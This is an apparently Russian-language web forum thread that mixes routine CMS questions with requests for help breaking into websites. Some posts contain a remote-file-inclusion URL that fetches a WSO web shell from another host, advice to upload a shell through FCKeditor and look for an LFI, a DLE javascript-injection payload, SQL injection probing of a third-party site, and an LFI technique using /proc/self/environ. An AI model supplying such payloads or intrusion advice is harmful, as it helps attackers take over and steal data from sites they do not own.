А вот допустим сейчас вышла новая версия vBulletin 4.0 Publishing Suite что входит в неё?если я приобрету смогу ли я пользоватся первое время стабильной 3.8.6 а после перейти без проблем на 4?
Есть сайты на osCommerce (версия 2003г), пытался вставить в индекс и футер что-либо, никакой реакции, на странице это не отражается почему-то. Очищение файла или нарушение целостности кода сразу отражается на странице. Почему так может быть?
4images Сегодня покопался на inj3ct0r.com и меня заинтересовал этот пост link Решил потестить на локальной машине. Скачал CMSку (1.7.8) с официального сайта, развернул и настроил как в мане написано. Попробовал заюзать описанную уязвимость так http://4images.local/global.php?db_servertype=http://shell.local/wso.txt%00 4images.local и shell.local - локальные домены. Кроме надписи "Security violation" ничего не увидел. Кто-нибудь тестил у себя? После просмотра исходника сложилось впечатление, что глобальный инъект невозможен, но может че-то сам не доганяю.
Всем привет. На одном сайте захотел приобрести шаблон, но у меня появился вопрос снизу перед выбором шаблона написано Type: CSS Full Site Flash 8 или CSS Static Full Site или ещё что либо,что это означает,я знаю что Type это вид, но вот что после не знаю, если ли Flash шаблон, для установки как система управления,например приобрел,установил и через него управлять? Дальше, аот шаблон,когда я смотрю все на Английском, смогу ли я изменить без проблем это на другие слова? Заранее спасибо
Вообще вопрос не совсем по тематике... Но рискну предположить, что где Flash-шаблон там настройки отображения зашиты в самом flash-файле или в xml-ки, а где CSS Static, то настройки не изменяемы либо в стандартном файле с расширением css. По-поводу языка - если ты покупаешь шаблон, то делай с ним что хошешь - разбирайся в исходниках.
Поставь пока бесплатный шаб, покрути там что по чем, если совсем в тягость будет. Обезопасишь себя от необдуманной траты средств.
В самом начале PHP: if (!defined('ROOT_PATH')) { die("Security violation"); } Константа не определена это раз PHP: 81 $db_servertype = "mysql"; 384 include_once(ROOT_PATH.'includes/db_'.strtolower($db_servertype).'.php'); Переменная $db_servertype определена ..никаких инжектов нету. а иньектор это команда плагиаторов-дебилойдов которые любят подобное гавно постить чтобы свой говно сайт в гугле поднять
Подскажите как имея на руках данные php.ini, возможность свюодно передвигаться по директориям сайта и используя уязвимость FCEditor или tiny_mce завладеть данными сайта
Если есть доступ до FCEditor, то можешь залить файл в директорию site.com/upload (стандартно), но накладываются ограничения на разрешение, так что заливай текстовик с шеллом и попробуй найти LFI. Про возможность свободно передвигаться не совсем понял. Поясни.
То есть есть какая то директоря например систем а в ней мноого чего. И по ней как по фтп нику можно ходить Но файлы пх соответвественно не посмотришь а во структуру узнать можно PS есть ли какая нибудь уязвимость у tiny_mce насколько я понял они отказались от ФЦКЕдитора PSPS По ходу форум журнала компьютерных хулиганов поломали висит 403 ошибка
Можно ходить браузером? Это похоже просто проиндексированная директория (более интересного объяснения еще не встречал)) ). Это тебе для fckeditor __http://inj3ct0r.com/exploits/9708, а это для tiny_mce __http://inj3ct0r.com/exploits/12282.
DLE 8.5 site.ru/engine/modules/imagepreview.php?image=javajavascriptscript:document.write(String.fromCharCode(закоденный,html,код)) подскажите что можно сделать с сайтом, имея это?
DLE 8.2 При переходе по разделам каждый раз требует авторизоваться.Я так понимаю надо отключить контроль изменения IP в настройках скрипта,но как это можно сделать если при нажатии на кнопку "Сохранить" вновь требует авторизацию ?
А что у тебя ip динамически меняется без переподключения? Попробуй в конфиг или в базу данных внести нужные параметры напрямую.
здрасте всем. есть сайт, база данных - oracl, на сайте скрипт, показывающий поверх загруженной страницы карточку и данными пользователя, команда javascript:getdivlayerimgprofile(id). getdivlayerimgprofile(5) дает такой же результат как getdivlayerimgprofile(2+3). как еще можно проверить наличие sql уязвимости?
Всем доброго времени! Научите люди добрые. Имею dbconfig. Нужно узнать путь на сервере. sit.ru/phpmyadmin/ и sit.ru/myadmin/ не проканывает я знаю есть и другие варианты (не будишь же руками все перебирать). Может соф какой есть, или еще что-то чтобы узнать путь?
Подскажите пожалуйста, где можно почитать/посмотреть о юзании LFI на FreeBSD? Так как вариант с /proc/self/environ тут не прокатывает.
